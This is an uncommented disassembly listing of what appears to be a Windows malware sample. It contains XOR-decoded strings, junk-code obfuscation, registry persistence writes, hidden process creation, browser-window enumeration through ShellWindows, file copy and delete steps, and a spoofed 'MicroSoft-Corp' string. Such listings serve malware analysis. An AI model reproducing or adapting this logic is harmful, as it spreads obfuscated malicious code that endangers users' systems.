lea esi, aQu_d ; "qu.d"
mov ecx, 5
rep movsb
call sub_40C944 ; GetCurrentThreadId
lea edi, [ebp+var_10E]
lea esi, byte_44233A
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_40620C
; ---------------------------------------------------------------------------
loc_4060BF: ; CODE XREF: sub_406073+1A1�j
lea edi, [ebp+var_118+1]
lea esi, byte_44233B
mov ecx, 7
rep movsb
push 44h
push offset byte_44720F
call sub_40531B
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CE54
lea edi, [ebp+var_11C+2]
lea esi, word_442342
mov ecx, 3
rep movsb
push 4
push offset asc_44720A ; "!& !"
call sub_40531B
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_401614
call sub_40C9C8 ; GetTickCount
push 4
push offset asc_44720A ; "!& !"
call sub_40531B
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_401614
mov [ebp+var_110], 1736h
movzx eax, [ebp+var_110]
imul eax, 5FBBh
mov [ebp+var_110], ax
push 4Dh
push offset dword_4471BC
call sub_40531B
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CE54
mov ax, word_442345
mov word ptr [ebp+var_11C], ax
push 4
push offset asc_44720A ; "!& !"
call sub_40531B
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_401614
push 4
push offset asc_44720A ; "!& !"
call sub_40531B
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_401614
add esp, 0A8h
call sub_40C9C8 ; GetTickCount
add [ebp+var_101], 1
loc_40620C: ; CODE XREF: sub_406073+47�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_4060BF
call sub_40C9D4 ; GetVersion
cmp eax, 80000000h
jb short loc_40629F
mov [ebp+var_114], 3672h
mov eax, [ebp+var_114]
mov edx, eax
add edx, eax
mov [ebp+var_114], edx
push 4Ch
push offset byte_44716F
call sub_40531B
mov [ebp+var_118], eax
push 10h
push offset word_44715E
call sub_40531B
mov [ebp+var_11C], eax
push 3
push offset word_44715A
call sub_40531B
push 1
mov edi, 0Eh
sub edi, dword_4422E0
push edi
push eax
mov edi, [ebp+var_11C]
push edi
mov edi, [ebp+var_118]
push edi
push 80000003h
call sub_401614
add esp, 30h
jmp loc_40632C
; ---------------------------------------------------------------------------
loc_40629F: ; CODE XREF: sub_406073+1B1�j
mov byte ptr [ebp+var_110+1], 0D4h
add byte ptr [ebp+var_110+1], 1
mov ax, word_442347
mov [ebp+var_2114], ax
lea eax, [ebp+var_1113]
push eax
call sub_405249
call sub_40C944 ; GetCurrentThreadId
push 59h
push offset dword_447100
call sub_40531B
lea edi, [ebp+var_1113]
push edi
push eax
lea edi, [ebp+var_2112]
push edi
call sub_40CE54
mov byte ptr [ebp+var_110], 0F1h
add byte ptr [ebp+var_110], 45h
and [ebp+var_114], 0
push 0Ch
push offset byte_4470F3
call sub_40531B
push 4
push 4
lea edi, [ebp+var_114]
push edi
push eax
lea edi, [ebp+var_2112]
push edi
push 80000003h
call sub_401614
add esp, 38h
loc_40632C: ; CODE XREF: sub_406073+227�j
push 3Bh
push offset byte_4470B7
call sub_40531B
mov [ebp+var_114], eax
push 11h
push offset byte_4470A5
call sub_40531B
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
mov edi, [ebp+var_114]
push edi
push 80000001h
call sub_401614
mov ebx, 45ADh
sub ebx, 884h
push 33h
push offset byte_447071
call sub_40531B
push 1
push 0
push offset byte_447569
push offset byte_447569
push eax
push 80000001h
call sub_401614
push 3Bh
push offset byte_447035
call sub_40531B
push 1
push 0
push offset byte_447569
push offset byte_447569
push eax
push 80000001h
call sub_401614
add esp, 68h
pop edi
pop esi
pop ebx
leave
retn
sub_406073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063C4 proc near ; CODE XREF: sub_409A96+287�p
; sub_409A96+5E4�p ...
var_3AC = dword ptr -3ACh
var_3A5 = byte ptr -3A5h
var_2A1 = byte ptr -2A1h
var_29B = byte ptr -29Bh
var_294 = word ptr -294h
var_292 = byte ptr -292h
var_291 = byte ptr -291h
var_290 = dword ptr -290h
var_28A = word ptr -28Ah
var_288 = byte ptr -288h
var_282 = byte ptr -282h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26B = byte ptr -26Bh
var_26A = word ptr -26Ah
var_268 = dword ptr -268h
var_264 = word ptr -264h
var_262 = word ptr -262h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3ACh
push ebx
push esi
push edi
mov [ebp+var_262], 1CB7h
movzx eax, [ebp+var_262]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_262], ax
and [ebp+var_14C], 0
mov [ebp+var_264], 40B8h
movzx eax, [ebp+var_264]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_264], ax
xor ebx, ebx
lea edi, [ebp+var_282]
lea esi, aLum_ ; "lum&_"
mov ecx, 3
rep movsw
push offset dword_4422E8
call sub_40CA34 ; InterlockedIncrement
mov [ebp+var_270], eax
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40CE24
mov [ebp+var_274], 104h
call sub_40C9D4 ; GetVersion
push 21h
push offset byte_447013
call sub_40531B
mov [ebp+var_290], eax
push 4
push offset a@qdx ; "@qdx"
call sub_40531B
lea edi, [ebp+var_288]
push edi
lea edi, [ebp+var_274]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_290]
push edi
push 80000002h
call sub_4014CB
add esp, 34h
mov [ebp+var_278], eax
call sub_40C944 ; GetCurrentThreadId
cmp [ebp+var_278], 0
jnz short loc_4064CB
call sub_40C9D4 ; GetVersion
push [ebp+arg_0]
call sub_40CA88 ; LocalFree
call sub_40C938 ; GetCurrentProcessId
xor eax, eax
jmp loc_406932
; ---------------------------------------------------------------------------
loc_4064CB: ; CODE XREF: sub_4063C4+EC�j
call sub_406073
call sub_40C968 ; RtlGetLastWin32Error
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C920 ; ExpandEnvironmentStringsA
mov ax, word_44234F
mov [ebp+var_28A], ax
push [ebp+var_270]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_4056CB
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_406545
cmp eax, 0FFFFFFFFh
jz short loc_40653F
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_406545
; ---------------------------------------------------------------------------
loc_40653F: ; CODE XREF: sub_4063C4+16C�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_406545: ; CODE XREF: sub_4063C4+167�j
; sub_4063C4+179�j
cmp [ebp+var_14C], 0
jnz short loc_40657C
call sub_40C9C8 ; GetTickCount
push [ebp+arg_0]
call sub_40CA88 ; LocalFree
mov [ebp+var_291], 88h
movzx eax, [ebp+var_291]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_291], al
xor eax, eax
jmp loc_406932
; ---------------------------------------------------------------------------
loc_40657C: ; CODE XREF: sub_4063C4+188�j
push 0Eh
push offset byte_446FFF
call sub_40531B
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE78
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40CE78
call sub_4045BD
mov [ebp+var_27C], eax
call sub_40C9C8 ; GetTickCount
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CE24
mov [ebp+var_268], 511Dh
add [ebp+var_268], 4C5Ah
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CE24
add esp, 30h
mov [ebp+var_26A], 0A15h
sub [ebp+var_26A], 1A5Fh
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_27C], 0
jz short loc_406636
lea eax, [ebp+var_148]
push eax
call sub_40466A
pop ecx
jmp short loc_40663F
; ---------------------------------------------------------------------------
loc_406636: ; CODE XREF: sub_4063C4+261�j
mov [ebp+var_118], 0
loc_40663F: ; CODE XREF: sub_4063C4+270�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40CB78 ; CreateProcessA
or eax, eax
jz loc_4068CB
call sub_40CA58 ; IsDebuggerPresent
push [ebp+var_25C]
call sub_40C9B0 ; CloseHandle
call sub_40C938 ; GetCurrentProcessId
push 22h
push offset dword_446FDC
call sub_40531B
push [ebp+var_270]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE54
add esp, 18h
mov [ebp+var_292], 33h
movzx eax, [ebp+var_292]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_292], al
mov [ebp+var_291], 0
jmp short loc_406729
; ---------------------------------------------------------------------------
loc_4066CE: ; CODE XREF: sub_4063C4+36D�j
call sub_40C968 ; RtlGetLastWin32Error
push 7
push offset aYuvbqU ; "YUVbq}u"
call sub_40531B
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40CBB4 ; FindWindowA
mov ebx, eax
or ebx, ebx
jnz short loc_406733
mov eax, dword_4422DC
add eax, 3E2h
push eax
call sub_40CAF4 ; Sleep
mov [ebp+var_294], 6F4Fh
movzx eax, [ebp+var_294]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_294], ax
add [ebp+var_291], 1
loc_406729: ; CODE XREF: sub_4063C4+308�j
mov al, [ebp+var_291]
cmp al, 0Ah
jb short loc_4066CE
loc_406733: ; CODE XREF: sub_4063C4+32F�j
or ebx, ebx
jz loc_4068BD
call sub_40C9D4 ; GetVersion
push 0EA60h
call sub_40CAF4 ; Sleep
lea edi, [ebp+var_294+1]
lea esi, byte_442351
xor ecx, ecx
inc ecx
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40CB9C ; GetWindowTextA
lea edi, [ebp+var_29B]
lea esi, aFucxB6 ; "FUCX'b6"
movsd
movsd
mov eax, 0Bh
sub eax, dword_4422E0
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_401883
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_4068AF
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_2A1]
lea esi, aDr ; "&:&dr"
mov ecx, 3
rep movsw
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_3A5]
push eax
push [ebp+arg_4]
call sub_405415
add esp, 8
or eax, eax
jz loc_40689E
call sub_40CA58 ; IsDebuggerPresent
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3A5]
push eax
call sub_40CA70 ; CopyFileA
call sub_40CA58 ; IsDebuggerPresent
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401AF1
mov [ebp+var_3AC], eax
call sub_40C998 ; GetProcessHeap
push [ebp+arg_8]
call sub_40C908 ; DeleteFileA
call sub_40C9D4 ; GetVersion
push offset aHtml ; "<HTML><!--"
call sub_40CB60 ; lstrlen
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3AC]
call sub_40CE90
add esp, 14h
or eax, eax
jnz short loc_40686C
push offset aHtml ; "<HTML><!--"
call sub_40CB60 ; lstrlen
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3AC]
push edi
push [ebp+arg_8]
call sub_4053A3
add esp, 0Ch
jmp short loc_406887
; ---------------------------------------------------------------------------
loc_40686C: ; CODE XREF: sub_4063C4+47C�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3AC]
push [ebp+arg_8]
call sub_4053A3
add esp, 0Ch
loc_406887: ; CODE XREF: sub_4063C4+4A6�j
push [ebp+var_3AC]
call sub_40CA88 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_4068D7
; ---------------------------------------------------------------------------
loc_40689E: ; CODE XREF: sub_4063C4+414�j
call sub_40C944 ; GetCurrentThreadId
mov [ebp+var_14C], 1
jmp short loc_4068D7
; ---------------------------------------------------------------------------
loc_4068AF: ; CODE XREF: sub_4063C4+3DC�j
call sub_40C9D4 ; GetVersion
and [ebp+var_14C], 0
jmp short loc_4068D7
; ---------------------------------------------------------------------------
loc_4068BD: ; CODE XREF: sub_4063C4+371�j
call sub_40C9D4 ; GetVersion
and [ebp+var_14C], 0
jmp short loc_4068D7
; ---------------------------------------------------------------------------
loc_4068CB: ; CODE XREF: sub_4063C4+2A5�j
call sub_40CA58 ; IsDebuggerPresent
and [ebp+var_14C], 0
loc_4068D7: ; CODE XREF: sub_4063C4+4D8�j
; sub_4063C4+4E9�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C908 ; DeleteFileA
mov [ebp+var_26B], 0CBh
movzx eax, [ebp+var_26B]
imul eax, 4FDEh
mov [ebp+var_26B], al
push [ebp+arg_0]
call sub_40CA88 ; LocalFree
call sub_40C944 ; GetCurrentThreadId
push 0
push [ebp+var_260]
call sub_40CB00 ; TerminateProcess
call sub_40C968 ; RtlGetLastWin32Error
push [ebp+var_260]
call sub_40C9B0 ; CloseHandle
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+var_14C]
loc_406932: ; CODE XREF: sub_4063C4+102�j
; sub_4063C4+1B3�j
pop edi
pop esi
pop ebx
leave
retn
sub_4063C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406937 proc near ; CODE XREF: sub_406B58+C2�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442368
lea eax, ds:41C7E0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_406976
; ---------------------------------------------------------------------------
loc_40695C: ; CODE XREF: sub_406937+41�j
mov eax, dword_442368
add eax, edi
lea eax, ds:41C7E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0B0h
mov [eax], dl
inc edi
loc_406976: ; CODE XREF: sub_406937+23�j
cmp edi, esi
jl short loc_40695C
mov eax, dword_442368
add eax, esi
mov byte ptr ds:dword_41C7E0[eax], 0
xor edi, edi
mov edi, dword_442368
mov eax, edi
lea eax, [eax+esi+3]
mov dword_442368, eax
add dword_442368, 2
cmp dword_442368, 0DD5h
jle short loc_4069B6
and dword_442368, 0
loc_4069B6: ; CODE XREF: sub_406937+76�j
lea eax, dword_41C7E0[edi]
pop edi
pop esi
pop ebp
retn
sub_406937 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069C0 proc near ; CODE XREF: sub_406EA8+150�p
; sub_406EA8+4D8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
call sub_40CA58 ; IsDebuggerPresent
push ebx
call sub_40CB6C ; lstrlenW
mov edi, eax
call sub_40C998 ; GetProcessHeap
push 0
push 0
push 1FFFh
push esi
push edi
push ebx
push 0
push 0
call sub_40CB30 ; WideCharToMultiByte
call sub_40C9D4 ; GetVersion
mov byte ptr [esi+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4069C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A03 proc near ; CODE XREF: sub_406A6B+DB�p
var_8 = byte ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C968 ; RtlGetLastWin32Error
cmp dword_442370, 0
jz short loc_406A27
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406A27: ; CODE XREF: sub_406A03+17�j
lea edi, [ebp+var_8]
lea esi, aYScl ; "y |SCl"
mov ecx, 7
rep movsb
mov eax, [ebx+4]
push dword ptr [ebx+4]
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C998 ; GetProcessHeap
mov eax, [ebx]
push dword ptr [ebx]
mov esi, [eax]
call dword ptr [esi+8]
call sub_40BE78
mov [ebp+var_1], 0EBh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
pop edi
pop esi
pop ebx
leave
retn
sub_406A03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A6B proc near ; CODE XREF: sub_406EA8+55�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2A = dword ptr -2Ah
var_26 = byte ptr -26h
var_1E = byte ptr -1Eh
var_19 = byte ptr -19h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_8], 210Fh
inc [ebp+var_8]
lea edi, [ebp+var_1E]
lea esi, a89vb_0 ; "89"
mov ecx, 5
rep movsb
and dword ptr [ebx], 0
and dword ptr [ebx+4], 0
push 0
call sub_40BE6C
lea edi, [ebp+var_26]
lea esi, aCkrW@g_0 ; "ckR%W@g"
movsd
movsd
lea eax, [ebp+var_19]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40BE60
mov [ebp+var_4], eax
call sub_40C9C8 ; GetTickCount
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_30], eax
test eax, eax
jnz short loc_406B45
call sub_40C944 ; GetCurrentThreadId
push ebx
push offset dword_447B5C
push 4
push 0
lea eax, [ebp+var_19]
push eax
call sub_40BE54
mov [ebp+var_4], eax
call sub_40C968 ; RtlGetLastWin32Error
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_34], eax
test eax, eax
jnz short loc_406B45
mov [ebp+var_9], 39h
add [ebp+var_9], 1
mov eax, ebx
add eax, 4
push eax
push offset dword_447B4C
mov eax, [ebx]
push dword ptr [ebx]
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44238C
mov [ebp+var_2A], eax
xor eax, eax
cmp [ebp+var_4], 0
setl al
mov [ebp+var_38], eax
test eax, eax
jnz short loc_406B45
call sub_40C9C8 ; GetTickCount
xor eax, eax
inc eax
jmp short loc_406B53
; ---------------------------------------------------------------------------
loc_406B45: ; CODE XREF: sub_406A6B+63�j
; sub_406A6B+93�j ...
push ebx
call sub_406A03
pop ecx
call sub_40C9C8 ; GetTickCount
xor eax, eax
loc_406B53: ; CODE XREF: sub_406A6B+D8�j
pop edi
pop esi
pop ebx
leave
retn
sub_406A6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B58 proc near ; CODE XREF: sub_406EA8+8C�p
var_1005C = dword ptr -1005Ch
var_10058 = word ptr -10058h
var_10056 = byte ptr -10056h
var_10051 = byte ptr -10051h
var_1004A = word ptr -1004Ah
var_10048 = byte ptr -10048h
var_10040 = byte ptr -10040h
var_1003D = byte ptr -1003Dh
var_10038 = dword ptr -10038h
var_10031 = byte ptr -10031h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1005Ch
call sub_40C8BC
push ebx
push esi
push edi
lea edi, [ebp+var_1003D]
lea esi, aTm4 ; "tm4 "
mov ecx, 5
rep movsb
cmp dword_442374, 0FFFFh
jz short loc_406B8E
and dword_44236C, 0
loc_406B8E: ; CODE XREF: sub_406B58+2D�j
mov [ebp+var_D], 2Eh
sub [ebp+var_D], 44h
mov eax, dword_44236C
cmp [ebp+arg_4], eax
jz loc_406E16
lea edi, [ebp+var_10040]
lea esi, aP_0 ; "p "
mov ecx, 3
rep movsb
mov eax, [ebp+arg_4]
mov dword_44236C, eax
cmp dword_442370, 0
jz short loc_406BE4
call sub_40C9C8 ; GetTickCount
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C998 ; GetProcessHeap
and dword_442370, 0
loc_406BE4: ; CODE XREF: sub_406B58+6E�j
lea edi, [ebp+var_10048]
lea esi, aVh4zA ; "H4z+ a"
movsd
movsd
push 0FFFFh
lea eax, [ebp+var_10031]
push eax
push [ebp+arg_4]
call sub_40CB9C ; GetWindowTextA
mov ax, word_4423A0
mov [ebp+var_1004A], ax
push 1Bh
push offset dword_446F54
call sub_406937
mov edi, 6
sub edi, dword_442360
push edi
push eax
lea edi, [ebp+var_10031]
push edi
call sub_401883
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406C60
mov [ebp+var_10058], 4BE6h
sub [ebp+var_10058], 1F66h
and dword_442370, 0
jmp loc_406E16
; ---------------------------------------------------------------------------
loc_406C60: ; CODE XREF: sub_406B58+E8�j
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
cmp [ebp+var_C], 0
jz loc_406E16
lea edi, [ebp+var_10051]
lea esi, aNnNX_0 ; "nN#n=X"
mov ecx, 7
rep movsb
or ebx, ebx
jnz loc_406E16
mov [ebp+var_10], 69BEh
add [ebp+var_10], 539Fh
and [ebp+var_4], 0
cmp dword_442374, 0FFFFh
jz short loc_406CE5
call sub_40C944 ; GetCurrentThreadId
inc dword_442374
mov eax, [ebp+var_C]
cmp dword_442374, eax
jbe short loc_406CD0
and dword_442374, 0
loc_406CD0: ; CODE XREF: sub_406B58+16F�j
mov ax, word_4423A9
mov [ebp+var_10058], ax
mov eax, dword_442374
mov [ebp+var_4], eax
loc_406CE5: ; CODE XREF: sub_406B58+159�j
; sub_406B58+2A0�j
push 0
call sub_40CDDC
pop ecx
mov [ebp+var_12], 631Fh
inc [ebp+var_12]
mov [ebp+var_28], 2
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov dword_442374, eax
lea eax, [ebp+var_18]
push eax
lea esi, [ebp+var_28]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C998 ; GetProcessHeap
or ebx, ebx
jnz loc_406DD6
call sub_40CA58 ; IsDebuggerPresent
push offset dword_442370
push offset dword_447B6C
mov eax, [ebp+var_18]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_2C], 615Eh
inc [ebp+var_2C]
or ebx, ebx
jnz short loc_406DD6
lea edi, [ebp+var_10056]
lea esi, aPt ; "pt^ "
mov ecx, 5
rep movsb
lea eax, [ebp+var_10038]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
call sub_40C998 ; GetProcessHeap
or ebx, ebx
jnz short loc_406DD6
mov [ebp+var_30], 2E8h
mov eax, 12E0h
mul [ebp+var_30]
mov [ebp+var_1005C], eax
mov [ebp+var_30], eax
mov dword_442374, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_10038], eax
jz short loc_406E16
mov [ebp+var_32], 6A81h
movzx eax, [ebp+var_32]
imul eax, 5FFBh
mov [ebp+var_32], ax
loc_406DD6: ; CODE XREF: sub_406B58+1D8�j
; sub_406B58+208�j ...
cmp dword_442370, 0
jz short loc_406DEA
mov eax, dword_442370
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406DEA: ; CODE XREF: sub_406B58+285�j
call sub_40CA58 ; IsDebuggerPresent
inc [ebp+var_4]
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb loc_406CE5
mov [ebp+var_8], 74D3h
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
and dword_442370, 0
loc_406E16: ; CODE XREF: sub_406B58+46�j
; sub_406B58+103�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E1B proc near ; CODE XREF: sub_406EA8+571�p
; sub_406EA8+5C5�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 82h
push esi
push [ebp+arg_0]
mov eax, dword_4423B8
lea eax, ds:431F20h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_406E63
; ---------------------------------------------------------------------------
loc_406E49: ; CODE XREF: sub_406E1B+4A�j
mov eax, dword_4423B8
add eax, edi
lea eax, ds:431F20h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D4h
mov [eax], dl
inc edi
loc_406E63: ; CODE XREF: sub_406E1B+2C�j
cmp edi, esi
jl short loc_406E49
mov eax, dword_4423B8
add eax, esi
mov byte ptr ds:dword_431F20[eax], 0
xor edi, edi
mov edi, dword_4423B8
mov eax, edi
lea eax, [eax+esi+1]
mov dword_4423B8, eax
cmp eax, 0DF2h
jle short loc_406E97
and dword_4423B8, 0
loc_406E97: ; CODE XREF: sub_406E1B+73�j
mov [ebp+var_8], 216h
lea eax, dword_431F20[edi]
pop edi
pop esi
leave
retn
sub_406E1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EA8 proc near ; CODE XREF: sub_407F79+5E�p
var_6382B = byte ptr -6382Bh
var_63826 = word ptr -63826h
var_63824 = dword ptr -63824h
var_6381E = word ptr -6381Eh
var_6381C = byte ptr -6381Ch
var_6281E = word ptr -6281Eh
var_6281B = byte ptr -6281Bh
var_62816 = byte ptr -62816h
var_62813 = byte ptr -62813h
var_62812 = word ptr -62812h
var_62810 = word ptr -62810h
var_62808 = dword ptr -62808h
var_62800 = word ptr -62800h
var_627F8 = dword ptr -627F8h
var_627F0 = dword ptr -627F0h
var_627EC = dword ptr -627ECh
var_627E6 = dword ptr -627E6h
var_627E2 = word ptr -627E2h
var_627DF = byte ptr -627DFh
var_627DC = byte ptr -627DCh
var_627D5 = byte ptr -627D5h
var_627D0 = dword ptr -627D0h
var_627CC = dword ptr -627CCh
var_627C6 = word ptr -627C6h
var_627C4 = byte ptr -627C4h
var_627C3 = byte ptr -627C3h
var_626C4 = dword ptr -626C4h
var_626C0 = word ptr -626C0h
var_626BE = byte ptr -626BEh
var_626BD = byte ptr -626BDh
var_626BC = dword ptr -626BCh
var_626B8 = word ptr -626B8h
var_626B0 = dword ptr -626B0h
var_626A4 = dword ptr -626A4h
var_626A0 = dword ptr -626A0h
var_6269C = dword ptr -6269Ch
var_62698 = dword ptr -62698h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62687 = byte ptr -62687h
var_62685 = byte ptr -62685h
var_62684 = dword ptr -62684h
var_62680 = word ptr -62680h
var_6267D = byte ptr -6267Dh
var_526B1 = byte ptr -526B1h
var_526AE = word ptr -526AEh
var_526AC = dword ptr -526ACh
var_526A8 = byte ptr -526A8h
var_526A0 = dword ptr -526A0h
var_52692 = word ptr -52692h
var_52690 = dword ptr -52690h
var_5268C = dword ptr -5268Ch
var_52688 = dword ptr -52688h
var_52684 = dword ptr -52684h
var_52680 = word ptr -52680h
var_5267E = byte ptr -5267Eh
var_52678 = byte ptr -52678h
var_52670 = byte ptr -52670h
var_52669 = dword ptr -52669h
var_52665 = byte ptr -52665h
var_5265F = byte ptr -5265Fh
var_5265A = dword ptr -5265Ah
var_52655 = byte ptr -52655h
var_5264E = byte ptr -5264Eh
var_52648 = dword ptr -52648h
var_52643 = byte ptr -52643h
var_5263D = byte ptr -5263Dh
var_5263A = byte ptr -5263Ah
var_52634 = dword ptr -52634h
var_52630 = dword ptr -52630h
var_5262C = byte ptr -5262Ch
var_52622 = byte ptr -52622h
var_52621 = byte ptr -52621h
var_52620 = dword ptr -52620h
var_5261C = dword ptr -5261Ch
var_52618 = dword ptr -52618h
var_52611 = byte ptr -52611h
var_52610 = dword ptr -52610h
var_5260C = dword ptr -5260Ch
var_52605 = byte ptr -52605h
var_52604 = dword ptr -52604h
var_52600 = dword ptr -52600h
var_525FA = word ptr -525FAh
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
